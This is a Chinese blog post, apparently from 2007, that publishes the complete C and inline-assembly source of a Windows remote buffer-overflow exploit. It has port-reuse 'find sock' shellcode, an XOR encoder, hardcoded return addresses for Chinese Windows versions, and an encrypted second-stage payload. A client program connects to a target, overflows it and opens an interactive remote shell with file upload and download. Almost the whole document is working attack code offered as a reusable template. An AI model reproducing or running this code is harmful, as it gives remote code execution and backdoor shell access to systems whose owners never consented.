端口复用shellcode 's

  • A+
所属分类:鬼仔Blog
摘要

作者:刺硬盘里有很多使用各种各样的技巧来实现端口复用的shellcode,都是以前写的。翻出来一个比较矬的,贴到这里。想扩展的朋友可以自己改。 这个shellcode也可以很方便的扩展为写C/S类型的exploit模板

作者:

硬盘里有很多使用各种各样的技巧来实现端口复用的shellcode,都是以前写的。翻出来一个比较矬的,贴到这里。想扩展的朋友可以自己改。 这个shellcode也可以很方便的扩展为写C/S类型的exploit模板

这是 stage1 shellcode。

怀旧shellcode系列就贴到此为止了,老是在blog上贴这种代码似乎没什么人看。

/*
author: [email protected]
Team: Ph4nt0m Security Team(http://www.ph4nt0m.org)
Date: 2007

*/
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <io.h>
#pragma comment (lib,”ws2_32″)

struct OSTYPE
{
unsigned char ret[8];
char des[255];
};

OSTYPE os[] = {
{“/xe1/x1e/xfa/x7f”, “Windows CN ALL POP/POP/RET”},
{“/x5a/x21/x01/x78”, “Windows2000 SP3/SP4 ALL POP/POP/RET msvcrt.dll”},
{“/x12/x45/xfa/x7f”, “Windows CN JMPESP address from Chinese Ansi Code Page”},
{“/x34/x33/x80/x7c”, “Windows2003 CN SP1 CALL EAX”},
{“/x9f/xd6/xc1/x77”, “WindowsXP CN SP2 JMP EAX”},
{“/x41/x42/x43/x44”, “Ret Addr For Test”}
};

#define POP_POP_RET “/xfd/x2e/x92/x7c” //pop ebp,pop ebx,ret xp sp2 cn

char Payload[400] = “”; //server.exe

#define Magic_Len 1102

// 1098 +4 = 1102 bytes put/get 文件传输,传输加密 Xor_key = 0x33
char magic_shellcode[] =
“axis/x53/xe9/xd3/x03/x00/x00/x5f/x64/xa1/x30/x00/x00/x00/x8b/x40/x0c”
“/x8b/x70/x1c/xad/x8b/x68/x08/x8b/xf7/x6a/x0e/x59/xe8/x73/x03/x00”
“/x00/xe2/xf9/x68/x33/x32/x00/x00/x68/x77/x73/x32/x5f/x54/xff/x16”
“/x8b/xe8/x6a/x0d/x59/xe8/x5a/x03/x00/x00/xe2/xf9/x83/xc4/x08/x5b”
“/x89/x5e/x70/x6a/x01/x6a/x00/x6a/x0c/x8b/xdc/x68/xff/x00/x00/x00”
“/x53/x8d/x56/x74/x52/x83/xc2/x04/x52/xff/x56/x0c/x68/x5c/x30/x00”
“/x00/x68/x70/x69/x70/x65/x68/x5c/x5c/x2e/x5c/x8b/xfc/x33/xc0/x50”
“/x50/x50/x50/x68/xff/x00/x00/x00/x50/x68/x03/x00/x00/x40/x57/xff”
“/x56/x10/x89/x86/x80/x00/x00/x00/x33/xc0/x50/x50/x6a/x03/x53/x50”
“/x68/x00/x00/x00/x02/x57/xff/x56/x24/x89/x46/x7c/x68/x63/x6d/x64”
“/x00/x8d/x14/x24/x83/xec/x54/x8b/xfc/x6a/x14/x59/x33/xc0/x89/x04”
“/x8f/xe2/xfb/xc6/x47/x10/x44/xfe/x47/x3c/xfe/x47/x3d/xff/x76/x78”
“/x5b/x89/x5f/x48/xff/x76/x7c/x5b/x89/x5f/x4c/x89/x5f/x50/x8d/x47”
“/x10/x57/x50/x51/x51/x51/x6a/x01/x51/x51/x52/x51/xff/x56/x04/xff”
“/x37/x8f/x86/x84/x00/x00/x00/xff/x77/x04/x8f/x86/x88/x00/x00/x00”
“/xff/x76/x78/xff/x56/x14/xff/x76/x7c/xff/x56/x14/x83/xc4/x6c/x33”
“/xc0/x50/x6a/x01/x6a/x01/x50/xff/x56/x18/x89/x86/x8c/x00/x00/x00”
“/x33/xdb/x89/x9e/xa4/x00/x00/x00/x89/x86/xa8/x00/x00/x00/xff/x56”
“/x58/x89/x86/x90/x00/x00/x00/xc7/x86/x94/x00/x00/x00/x00/x00/x00”
“/x00/x6a/x21/xff/xb6/x90/x00/x00/x00/xff/x76/x70/xff/x56/x5c/x33”
“/xc0/x48/x50/x40/x50/x8d/x9e/x8c/x00/x00/x00/x53/x6a/x02/xff/x56”
“/x1c/x50/x8d/x9e/xf0/x00/x00/x00/x53/xff/xb6/x90/x00/x00/x00/xff”
“/x76/x70/xff/x56/x60/x6a/x00/xff/xb6/x90/x00/x00/x00/xff/x76/x70”
“/xff/x56/x5c/x6a/x00/x54/x68/x7e/x66/x04/x80/xff/x76/x70/xff/x56”
“/x64/x58/x59/xe3/x5c/x49/x0f/x85/xdb/x00/x00/x00/x6a/x00/x6a/x40”
“/x8d/x96/xf0/x00/x00/x00/x52/xff/x76/x70/xff/x56/x50/x8d/x96/xf0”
“/x00/x00/x00/x50/x59/xe8/xe2/x01/x00/x00/x81/xbe/xf0/x00/x00/x00”
“/x67/x65/x74/x20/x0f/x84/xe4/x00/x00/x00/x81/xbe/xf0/x00/x00/x00”
“/x70/x75/x74/x20/x0f/x84/x43/x01/x00/x00/x6a/x00/x8d/x9e/xac/x00”
“/x00/x00/x53/x50/x8d/x9e/xf0/x00/x00/x00/x53/xff/x76/x74/xff/x56”
“/x2c/x8b/x8e/x94/x00/x00/x00/xe3/x1d/x50/x8d/x9e/xac/x00/x00/x00”
“/x53/x8d/x9e/x98/x00/x00/x00/x53/xff/xb6/x80/x00/x00/x00/xff/x56”
“/x20/x91/xe3/x63/xeb/x2e/x8d/x9e/x98/x00/x00/x00/x53/x8d/x9e/xac”
“/x00/x00/x00/x53/x6a/x40/x8d/x9e/xb0/x00/x00/x00/x53/xff/xb6/x80”
“/x00/x00/x00/xff/x56/x28/xff/x86/x94/x00/x00/x00/x85/xc0/x0f/x84”
“/xfd/xfe/xff/xff/x8d/x96/xb0/x00/x00/x00/xff/xb6/xac/x00/x00/x00”
“/x59/xe8/x46/x01/x00/x00/xff/x8e/x94/x00/x00/x00/x6a/x00/x8b/x9e”
“/xac/x00/x00/x00/x53/x8d/x9e/xb0/x00/x00/x00/x53/xff/x76/x70/xff”
“/x56/x54/xe9/xca/xfe/xff/xff/xff/xb6/x84/x00/x00/x00/xff/x56/x08”
“/xff/xb6/x84/x00/x00/x00/xff/xb6/x88/x00/x00/x00/xff/xb6/x80/x00”
“/x00/x00/xff/x76/x74/xff/x56/x14/xff/x56/x14/xff/x56/x14/xff/x56”
“/x14/xff/x76/x70/xff/x56/x68/x33/xc0/x48/x50/xff/x56/x08/xc6/x84”
“/x06/xef/x00/x00/x00/x00/x8d/x96/xf4/x00/x00/x00/x33/xc0/x50/x50”
“/x6a/x03/x50/x50/x68/x00/x00/x00/x02/x52/xff/x56/x24/x89/x46/x7c”
“/x6a/x00/x8d/x96/xac/x00/x00/x00/x52/x6a/x40/x8d/x96/xb0/x00/x00”
“/x00/x52/xff/x76/x7c/xff/x56/x28/x8b/x8e/xac/x00/x00/x00/xe3/x22”
“/x8d/x96/xb0/x00/x00/x00/xe8/xa1/x00/x00/x00/x6a/x00/xff/xb6/xac”
“/x00/x00/x00/x8d/x96/xb0/x00/x00/x00/x52/xff/x76/x70/xff/x56/x54”
“/xeb/xbe/xff/x76/x7c/xff/x56/x14/xe9/x24/xfe/xff/xff/xc6/x84/x06”
“/xef/x00/x00/x00/x00/x8d/x96/xf4/x00/x00/x00/x33/xc0/x50/x50/x6a”
“/x02/x50/x50/x68/x00/x00/x00/x02/x52/xff/x56/x24/x89/x46/x7c/x6a”
“/x00/x6a/x40/x8d/x96/xb0/x00/x00/x00/x52/xff/x76/x70/xff/x56/x50”
“/x8d/x96/xb0/x00/x00/x00/x50/x59/xe8/x3f/x00/x00/x00/x6a/x00/x8d”
“/x96/xac/x00/x00/x00/x52/x50/x8d/x96/xb0/x00/x00/x00/x52/xff/x76”
“/x7c/xff/x56/x2c/x6a/x00/x54/x68/x7f/x66/x04/x40/xff/x76/x70/xff”
“/x56/x64/x59/xe3/x02/xeb/xb8/xff/x76/x7c/xff/x56/x14/xc6/x86/xf0”
“/x00/x00/x00/x0a/x6a/x01/x58/xe9/x3e/xfe/xff/xff/x4a/x80/x34/x0a”
“/x33/xe2/xfa/xc3/x51/x56/x8b/x75/x3c/x8b/x74/x2e/x78/x03/xf5/x56”
“/x8b/x76/x20/x03/xf5/x33/xc9/x49/x41/xad/x03/xc5/x33/xdb/x0f/xbe”
“/x10/x3a/xd6/x74/x08/xc1/xcb/x07/x03/xda/x40/xeb/xf1/x3b/x1f/x75”
“/xe7/x5e/x8b/x5e/x24/x03/xdd/x66/x8b/x0c/x4b/x8b/x5e/x1c/x03/xdd”
“/x8b/x04/x8b/x03/xc5/xab/x5e/x59/xc3/xe8/x28/xfc/xff/xff/x32/x74”
“/x91/x0c/xc9/xbc/xa6/x6b/x8f/xf2/x18/x61/x4a/x79/x19/x7a/xa8/x4b”
“/x60/x9e/x57/x66/x0d/xff/x76/x91/x4d/x6d/x88/x58/xb3/xac/x8a/x87”
“/x66/x62/x93/x32/xe4/x94/xb2/x36/x0f/x13/xc4/x8d/x1f/x74/xd3/x88”
“/x28/x49/xa0/x65/x97/xcb/x3d/x6a/xb4/x80/x2d/x32/x78/xde/x98/xc4”
“/xb9/xde/x64/x10/xa7/xdd/x0c/x9f/xd3/x4b/xb1/x1e/x97/x01/x76/x90”
“/x97/xc7/x64/x98/x97/xdd/x96/xd5/xd5/xa8/x9c/x07/xdc/x5a/xd8/x10”
“/x27/xa7/x52/x83/xe9/xea/x4c/x0f/x29/xd1”;

//char Payload[1600] = “”; //server_big.exe

#define PROC_BEGIN __asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90/
__asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90
#define PROC_END PROC_BEGIN

unsigned char sh_Buff[2048]; // recv real shellcode
unsigned int sh_Len;
unsigned int Enc_key=0x99; //其实无关紧要,动态寻找

#define Xor_key 0x33 //加密传输

unsigned char decode1[] =
/*
00401004 . /EB 0E JMP SHORT encode.00401014
00401006 $ |5B POP EBX
00401007 . |4B DEC EBX
00401008 . |33C9 XOR ECX,ECX
0040100A . |B1 FF MOV CL,0FF
0040100C > |80340B 99 XOR BYTE PTR DS:[EBX+ECX],99
00401010 .^|E2 FA LOOPD SHORT encode.0040100C
00401012 . |EB 05 JMP SHORT encode.00401019
00401014 > /E8 EDFFFFFF CALL encode.00401006
*/
“/xEB/x0E/x5B/x4B/x33/xC9/xB1”
“/xFF” // shellcode size
“/x80/x34/x0B”
“/x99” // xor byte
“/xE2/xFA/xEB/x05/xE8/xED/xFF/xFF/xFF”;

unsigned
char decode2[] =
/* ripped from eyas
00406030 /EB 10 JMP SHORT 00406042
00406032 |5B POP EBX
00406033 |4B DEC EBX
00406034 |33C9 XOR ECX,ECX
00406036 |66:B9 6601 MOV CX,166
0040603A |80340B 99 XOR BYTE PTR DS:[EBX+ECX],99
0040603E ^|E2 FA LOOPD SHORT 0040603A
00406040 |EB 05 JMP SHORT 00406047
00406042 /E8 EBFFFFFF CALL 00406032
*/
“/xEB/x10/x5B/x4B/x33/xC9/x66/xB9”
“/x66/x01” // shellcode size
“/x80/x34/x0B”
“/x99” // xor byte
“/xE2/xFA/xEB/x05/xE8/xEB/xFF/xFF/xFF”;

// kernel32.dll functions index
#define _LoadLibraryA 0x00
#define _WaitForSingleObjectEx 0x04
#define _Sleep 0x08

// ws2_32.dll functions index
#define _recv 0x0c
#define _ioctlsocket 0x10

// functions number
#define _Knums 3
#define _Wnums 2

// Need functions
unsigned char functions[100][128] =
{
// kernel32
{“LoadLibraryA”},
{“WaitForSingleObjectEx”},
{“Sleep”},
// ws2_32
{“recv”},
{“ioctlsocket”},
{“”},
};

void PrintSc(unsigned char *lpBuff, int buffsize);
void ShellCode();

// Get function hash
unsigned long hash(unsigned char *c)
{
unsigned long h=0;
while(*c)
{
h = ( ( h << 25 ) | ( h >> 7 ) ) + *c++;
}
return h;
}

// get shellcode
void GetShellCode()
{
char *fnbgn_str=”/x90/x90/x90/x90/x90/x90/x90/x90/x90″;
char *fnend_str=”/x90/x90/x90/x90/x90/x90/x90/x90/x90″;
unsigned char *pSc_addr;
unsigned char pSc_Buff[1024];
unsigned int MAX_Sc_Len=0x2000;
unsigned long dwHash[100];
unsigned int dwHashSize;

unsigned int l,i,j,k;

// Get functions hash
for (i=0;;i++) {
if (functions[i][0] == ‘/x0’) break;

dwHash[i] = hash(functions[i]);
//fprintf(stderr, “%.8X/t%s/n”, dwHash[i], functions[i]);
}
dwHashSize = i*4;

// Deal with shellcode
pSc_addr = (unsigned char *)ShellCode;

for (k=0;k<MAX_Sc_Len;++k ) {
if(memcmp(pSc_addr+k,fnbgn_str, 8)==0) {
break;
}
}
pSc_addr+=(k+8); // start of the ShellCode

for (k=0;k<MAX_Sc_Len;++k) {
if(memcmp(pSc_addr+k,fnend_str, 8)==0) {
break;
}
}
sh_Len=k; // length of the ShellCode

memcpy(pSc_Buff, pSc_addr, sh_Len);

// Add functions hash
memcpy(pSc_Buff+sh_Len, (unsigned char *)dwHash, dwHashSize);
sh_Len += dwHashSize;

printf(“%d bytes shellcode/n”, sh_Len);
// print shellcode
PrintSc(pSc_Buff, sh_Len);

// find xor byte
for(i=0xff; i>0; i–)
{
l = 0;
for(j=0; j<sh_Len; j++)
{
if (
// ((pSc_Buff[j] ^ i) == 0x26) || //%
// ((pSc_Buff[j] ^ i) == 0x3d) || //=
// ((pSc_Buff[j] ^ i) == 0x3f) || //?
((pSc_Buff[j] ^ i) == 0x40) || //@
((pSc_Buff[j] ^ i) == 0x00) ||
((pSc_Buff[j] ^ i) == 0x0D) ||
((pSc_Buff[j] ^ i) == 0x3c) || // <
((pSc_Buff[j] ^ i) == 0x3e) || // >
((pSc_Buff[j] ^ i) == 0x2a) || // *
((pSc_Buff[j] ^ i) == 0x3a) || // :
((pSc_Buff[j] ^ i) == 0x20) || // 空格
((pSc_Buff[j] ^ i) == 0x22) || // ”
((pSc_Buff[j] ^ i) == 0x0A) ||
((pSc_Buff[j] ^ i) == 0x2F) || // /
((pSc_Buff[j] ^ i) == 0x5C) // “/”
)
{
l++;
break;
};
}

if (l==0)
{
Enc_key = i;
//printf(“Find XOR Byte: 0x%02X/n”, i);
for(j=0; j<sh_Len; j++)
{
pSc_Buff[j] ^= Enc_key;
}

break; // break when found xor byte
}
}

// No xor byte found
if (l!=0){
//fprintf(stderr, “No xor byte found!/n”);

sh_Len = 0;
}
else {
//fprintf(stderr, “Xor byte 0x%02X/n”, Enc_key);

// encode
if (sh_Len > 0xFF) {
*(unsigned short *)&decode2[8] = sh_Len;
*(unsigned char *)&decode2[13] = Enc_key;

memcpy(sh_Buff, decode2, sizeof(decode2)-1);
memcpy(sh_Buff+sizeof(decode2)-1, pSc_Buff, sh_Len);
sh_Len += sizeof(decode2)-1;
}
else {
*(unsigned char *)&decode1[7] = sh_Len;
*(unsigned char *)&decode1[11] = Enc_key;

memcpy(sh_Buff, decode1, sizeof(decode1)-1);
memcpy(sh_Buff+sizeof(decode1)-1, pSc_Buff, sh_Len);
sh_Len += sizeof(decode1)-1;
}
}
}

// print shellcode
void PrintSc(unsigned char *lpBuff, int buffsize)
{
int i,j;
char *p;
char msg[4];
fprintf(stderr, “/* %d bytes *//n”,buffsize);
for(i=0;i<buffsize;i++)
{
if((i%16)==0)
if(i!=0)
fprintf(stderr, “/”/n/””);
else
fprintf(stderr, “/””);
sprintf(msg,”//x%.2X”,lpBuff[i]&0xff);
for( p = msg, j=0; j < 4; p++, j++ )
{
if(isupper(*p))
fprintf(stderr, “%c”, _tolower(*p));
else
fprintf(stderr, “%c”, p[0]);
}
}
fprintf(stderr, “/”;/n”);
}

// recv real shellcode function
void ShellCode()
{
__asm{

PROC_BEGIN //C macro to begin proc

jmp locate_addr
func_start:
pop edi ; get eip
mov eax, fs:30h
mov eax, [eax+0Ch]
mov esi, [eax+1Ch]
lodsd
mov ebp, [eax+8] ; base address of kernel32.dll
mov esi, edi
push _Knums
pop ecx

GetKFuncAddr: ; find functions from kernel32.dll
call find_hashfunc_addr
loop GetKFuncAddr

push 3233h
push 5F327377h ; ws2_32
push esp
call dword ptr [esi+_LoadLibraryA]
mov ebp, eax ; base address of ws2_32.dll
push _Wnums
pop ecx

GetWFuncAddr: ; find functions from ws2_32.dll
call find_hashfunc_addr
loop GetWFuncAddr

//find_s:
xor ebx, ebx
push 1000 ; sleep to wait for character send
call dword ptr [esi+_Sleep] ; maybe it is necessary in real internet

sub esp, 2000 ;在栈里分配空间,这里是2000 放在loop前比较稳定
mov edi, esp ; 把edi指过来

find_s_loop:
inc ebx ; socket

push 1
push 10
push ebx
call dword ptr [esi+_WaitForSingleObjectEx]

test eax, eax ; ensure ebx is socket
jnz find_s_loop

push 0
push esp ; 指向命令参数的指针,这里最好找个为内容空的地址。
push 4004667Fh ; FIONREAD
push ebx ;socket
call dword ptr [esi+_ioctlsocket]
pop ecx ; ensure this socket have 4 bit to read
cmp ecx, Magic_Len
jne find_s_loop

push 0
push Magic_Len ;shellcode recv的长度
push edi ;shellcode 要写入的地址,这里在栈里
push ebx
call dword ptr [esi+_recv]

mov esp, edi
pop eax
cmp eax, 73697861h ; recieve “axis”?
jnz find_s_loop

jmp esp ;直接jmp esp去执行我们的shellcode,因为前面的axis四字节,这里shellcode起址正好是esp

// int 3 //0xcc 调试shellcode用

find_hashfunc_addr:
push ecx
push esi
mov esi, [ebp+3Ch] ; e_lfanew
mov esi, [esi+ebp+78h] ; ExportDirectory RVA
add esi, ebp ; rva2va
push esi
mov esi, [esi+20h] ; AddressOfNames RVA
add esi, ebp ; rva2va
xor ecx, ecx
dec ecx

find_start:
inc ecx
lodsd
add eax, ebp
xor ebx, ebx

hash_loop:
movsx edx, byte ptr [eax]
cmp dl, dh
jz short find_addr
ror ebx, 7 ; hash
add ebx, edx
inc eax
jmp short hash_loop

find_addr:
cmp ebx, [edi] ; compare to hash
jnz short find_start
pop esi ; ExportDirectory
mov ebx, [esi+24h] ; AddressOfNameOrdinals RVA
add ebx, ebp ; rva2va
mov cx, [ebx+ecx*2] ; FunctionOrdinal
mov ebx, [esi+1Ch] ; AddressOfFunctions RVA
add ebx, ebp ; rva2va
mov eax, [ebx+ecx*4] ; FunctionAddress RVA
add eax, ebp ; rva2va
stosd ; function address save to [edi]
pop esi
pop ecx
retn

locate_addr:
call func_start

PROC_END //C macro to end proc

}

}
void Make_Payload(int q)
{
// server.exe
memset(Payload, 0x90, sizeof(Payload)-1);
memcpy(Payload + 52, &os[q].ret, 4);
strcpy(Payload + 56, (const char *)sh_Buff);
memcpy(Payload + 56 + strlen((const char *)sh_Buff), “/x90”, 1); //为了填充strcpy shellcode后所造成的/x00

/*
//server_big.exe jmp esp
memset(Payload, 0x90, sizeof(Payload)-1);
memcpy(Payload + 1204, &os[q].ret, 4);
strcpy(Payload + 1208, (const char *)sh_Buff);
memcpy(Payload + 1208 + strlen((const char *)sh_Buff), “/x90”, 1);
*/

/*
// server_big.exe overwrite esp+8 (seh)
// server_big.exe 覆盖 SEH
memset(Payload, 0x90, sizeof(Payload)-1);
memcpy(Payload + 1204, POP_POP_RET, 4); //覆盖 eip pop/pop/ret
memcpy(Payload + 1208, &os[q].ret, 4); // 覆盖 esp
memcpy(Payload + 1212, &os[q].ret, 4); // 覆盖 esp+4
memcpy(Payload + 1216, &os[q].ret, 4); // 覆盖 SEH jmp esp

// memcpy(Payload + 1220, “/x00”, 1);
strcpy(Payload + 1220, (const char *)sh_Buff);
memcpy(Payload + 1220 + strlen((const char *)sh_Buff), “/x90”, 1);
*/

PrintSc((unsigned char *)Payload, sizeof(Payload));

}

// ripped from isno
int Make_Connection(char *address,int port,int timeout)
{
struct sockaddr_in target;
SOCKET s;
int i;
DWORD bf;
fd_set wd;
struct timeval tv;

s = socket(AF_INET,SOCK_STREAM,0);
if(s<0)
return -1;

target.sin_family = AF_INET;
target.sin_addr.s_addr = inet_addr(address);
if(target.sin_addr.s_addr==0)
{
closesocket(s);
return -2;
}
target.sin_port = htons(port);
bf = 1;
ioctlsocket(s,FIONBIO,&bf);
tv.tv_sec = timeout;
tv.tv_usec = 0;
FD_ZERO(&wd);
FD_SET(s,&wd);
connect(s,(struct sockaddr *)&target,sizeof(target));
if((i=select(s+1,0,&wd,0,&tv))==(-1))
{
closesocket(s);
return -3;
}
if(i==0)
{
closesocket(s);
return -4;
}
i = sizeof(int);
getsockopt(s,SOL_SOCKET,SO_ERROR,(char *)&bf,&i);
if((bf!=0)||(i!=sizeof(int)))
{
closesocket(s);
return -5;
}
ioctlsocket(s,FIONBIO,&bf);
return s;
}

void xor_buf(unsigned char *buf, int size)
{
int i;

for (i=0; i<size; i++) {
buf[i] ^= Xor_key;
}

return;
}

/* ripped from TESO code and modifed by ey4s for win32 */
void shell (int sock)
{
int l,i,size=0,get_size=0;
char buf[1024];
char filename[128];
HANDLE hFile;
fd_set FdRead;

struct timeval time;
unsigned long ul[2];

time.tv_sec = 1;
time.tv_usec = 0;

while (1)
{
ul[0] = 1;
ul[1] = sock;

l = select (0, (fd_set *)&ul, NULL, NULL, &time);
if(l==1)
{
l = recv (sock, buf, sizeof (buf), 0);
if (l <= 0)
{
printf (“[-] Connection closed./n”);
return;
}

xor_buf((unsigned char *)buf, l);
l = write (1, buf, l);
if (l <= 0)
{
printf (“[-] Connection closed./n”);
return;
}
}
else
{
l = read (0, buf, sizeof (buf));
if (l <= 0)
{
printf(“[-] Connection closed./n”);
return;
}

xor_buf((unsigned char *)buf, l);
l = send(sock, buf, l, 0);
if (l <= 0)
{
printf(“[-] Connection closed./n”);
return;
}

xor_buf((unsigned char *)buf, l);

//+——————————————–
// get xxx download xxx
// put xxx upload xxx
//+——————————————–
if (strncmp(buf, “get”, 3) == 0)
{
// obtain filename
buf[l-1] = 0;
for (i=l;i>0;i–) {
if (buf[i] == ‘//’ || buf[i] == ‘ ‘) {
break;
}
}
strncpy(filename, buf+i+1, l-i-1);

hFile = CreateFile(
filename,
GENERIC_READ|GENERIC_WRITE,
FILE_SHARE_READ,
NULL,
CREATE_ALWAYS,
FILE_ATTRIBUTE_NORMAL|FILE_ATTRIBUTE_ARCHIVE,
(HANDLE)NULL
);

if ( hFile == INVALID_HANDLE_VALUE ) {
printf(“Create File %s Error!/n”, filename);
continue;
}

size = 0;

FD_ZERO(&FdRead);
FD_SET(sock, &FdRead);

for (;;) {
l = recv(sock, buf, sizeof(buf), 0);
xor_buf((unsigned char *)buf, l);

WriteFile(hFile, buf, l, (unsigned long *)&i, NULL);

size += i;

l = select (0, &FdRead, NULL, NULL, &time);

if (l != 1) {
memset(buf, 0x0a, 1);
xor_buf((unsigned char *)buf, 1);
l = send(sock, buf, 1, 0);
break;
}
}

printf(“Download remote file %s (%d bytes)!/n”, filename, size);

CloseHandle(hFile);
}
else if (strncmp(buf, “put”, 3) == 0)
{
Sleep(1000);

// obtain filename
buf[l-1] = 0;
for (i=l;i>0;i–) {
if (buf[i] == ‘//’ || buf[i] == ‘ ‘) {
break;
}
}
strncpy(filename, buf+i+1, l-i-1);

// open file
hFile = CreateFile(
filename,
GENERIC_READ|GENERIC_WRITE,
FILE_SHARE_READ,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL|FILE_ATTRIBUTE_ARCHIVE,
(HANDLE)NULL
);

if ( hFile == INVALID_HANDLE_VALUE ) {
printf(“Open File %s Error!/n”, filename);
continue;
}

size = 0;

// read file and send
for (;;)
{
ReadFile(hFile, buf, 1024, (unsigned long *)&i, NULL);

if (i == 0)
{
break;
}

xor_buf((unsigned char *)buf, i);
l = send(sock, buf, i, 0);

size += l;
}

printf(“Upload remote file %s (%d bytes)…”, filename, size);

l = recv (sock, buf, sizeof (buf), 0);
xor_buf((unsigned char *)buf, l);

l = write (1, buf, l);

CloseHandle(hFile);
}
}
}
}

void Disconnect(SOCKET s)
{
closesocket(s);
WSACleanup();
}

void help(char *n)
{
printf(“+——————————————————–+/n”);
printf(” Reuse port (Find Sock) Exploit by [email protected]/n”);
printf(” Ver 1.0 Please Keep it Private!/n”);
printf(“+——————————————————–+/n”);
printf(” Usage:/n”);
printf(” %s [Target IP] [Target Port] [OSType]/n/n”, n);
printf(” == OSType:/n”);
printf(” 0. Windows CN ALL SP1 POP/POP/RET /n”);
printf(” 1. Windows2000 SP3/SP4 ALL POP/POP/RET/n”);
printf(” 2. Windows CN ALL JMP ESP from ansi page/n”);
printf(” 3. Windows2003 CN SP1 CALL EAX/n”);
printf(” 4. WindowsXP CN SP2 JMP EAX/n”);
printf(” 5. TEST RET/n”);

}

int main(int argc, char *argv[])
{
unsigned short port = 25;

SOCKET s;
WSADATA WSAData;

if(argc != 4)
{
help(argv[0]);
return 0;
}

if(argc == 4) port = atoi(argv[2]);

GetShellCode();
if (!sh_Len)
{
printf(“[-] Shellcode generate error./n”);
exit(1);
}

printf(“shellcode length is: %d /n”,strlen((char *)sh_Buff));

if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0)
{
fprintf(stderr, “[-] WSAStartup failed./n”);
WSACleanup();
exit(1);
}

s = Make_Connection(argv[1], port, 10);
if(s<0)
{
fprintf(stderr, “[-] connect err./n”);
exit(1);
}

//OS type
int p = 0;
if(argc > 3)
p = atoi(argv[3]);

Make_Payload(p);

//Send our evil Payload
printf(“[+]Sending our Evil Payload./n”);

send(s, Payload, sizeof(Payload), 0);
Sleep(100);

// send real shellcode
send(s, magic_shellcode, Magic_Len, 0);

Sleep(1000);

// use same socket to get shell
shell(s);

WSACleanup();
return 1;
}

  • 我的微信
  • 这是我的微信扫一扫
  • weinxin
  • 我的微信公众号
  • 我的微信公众号扫一扫
  • weinxin

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: